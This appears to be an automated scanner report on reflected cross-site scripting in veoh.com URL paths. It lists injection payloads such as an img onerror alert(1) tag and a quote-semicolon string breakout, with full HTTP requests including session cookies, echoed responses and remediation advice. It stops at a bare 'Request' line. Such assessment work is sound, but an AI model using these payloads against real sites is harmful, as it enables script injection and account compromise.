GET /browse/videos/category/celebrity_and_showbizfcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1/watch/v20767641DYmkkC9T HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:07 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=50 Content-Length: 77572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/celebrity_and_showbizfcae8"><img src=a onerror=alert(1)>26d66e628b1/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160 was submitted in the REST URL parameter 4. This input was echoed as fb1e3<img src=a onerror=alert(1)>01b1c12b160 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/celebrity_and_showbizfb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160/watch/v20767641DYmkkC9T HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:47 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=9 Content-Length: 77528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_celebrity_and_showbizfb1e3<img src=a onerror=alert(1)>01b1c12b160"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e231'%3bf41ab2e3621 was submitted in the REST URL parameter 6. This input was echoed as 3e231';f41ab2e3621 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T3e231'%3bf41ab2e3621 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=98 Content-Length: 99706
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d was submitted in the REST URL parameter 4. This input was echoed as aa06e"><img src=a onerror=alert(1)>7b8d668185d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/educational_and_howtoaa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d/watch/v20767155HXCcYkcJ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 78368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/educational_and_howtoaa06e"><img src=a onerror=alert(1)>7b8d668185d/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1 was submitted in the REST URL parameter 4. This input was echoed as 1b1b0<img src=a onerror=alert(1)>1aed6fadab1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/educational_and_howto1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1/watch/v20767155HXCcYkcJ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 78324
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_educational_and_howto1b1b0<img src=a onerror=alert(1)>1aed6fadab1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c2d'%3b713d1af7ffd was submitted in the REST URL parameter 6. This input was echoed as b1c2d';713d1af7ffd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJb1c2d'%3b713d1af7ffd HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:55 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 99708
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a was submitted in the REST URL parameter 4. This input was echoed as b3fcf<img src=a onerror=alert(1)>5a765c7587a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/entertainmentb3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=100 Content-Length: 76165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_entertainmentb3fcf<img src=a onerror=alert(1)>5a765c7587a"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906 was submitted in the REST URL parameter 4. This input was echoed as b4e10"><img src=a onerror=alert(1)>e01df9f8906 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/entertainmentb4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:35 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=75 Content-Length: 76209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/entertainmentb4e10"><img src=a onerror=alert(1)>e01df9f8906/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a9e'%3b18c90b1747d was submitted in the REST URL parameter 6. This input was echoed as 48a9e';18c90b1747d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ48a9e'%3b18c90b1747d HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=50 Content-Length: 95042
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1 was submitted in the REST URL parameter 4. This input was echoed as 36ade<img src=a onerror=alert(1)>19ea89e01e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/people_and_blogs36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 77514
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_people_and_blogs36ade<img src=a onerror=alert(1)>19ea89e01e1"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac was submitted in the REST URL parameter 4. This input was echoed as b9b8b"><img src=a onerror=alert(1)>fa9b9160bac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/people_and_blogsb9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 77558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/people_and_blogsb9b8b"><img src=a onerror=alert(1)>fa9b9160bac/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614f9'%3be5e8b5ac5dc was submitted in the REST URL parameter 6. This input was echoed as 614f9';e5e8b5ac5dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP614f9'%3be5e8b5ac5dc HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=58 Content-Length: 106431
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 was submitted in the REST URL parameter 4. This input was echoed as ba32a"><img src=a onerror=alert(1)>a3be2b20567 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/groupsba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:47:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=51
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e was submitted in the REST URL parameter 4. This input was echoed as 254d4"><img src=a onerror=alert(1)>329c969f72e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
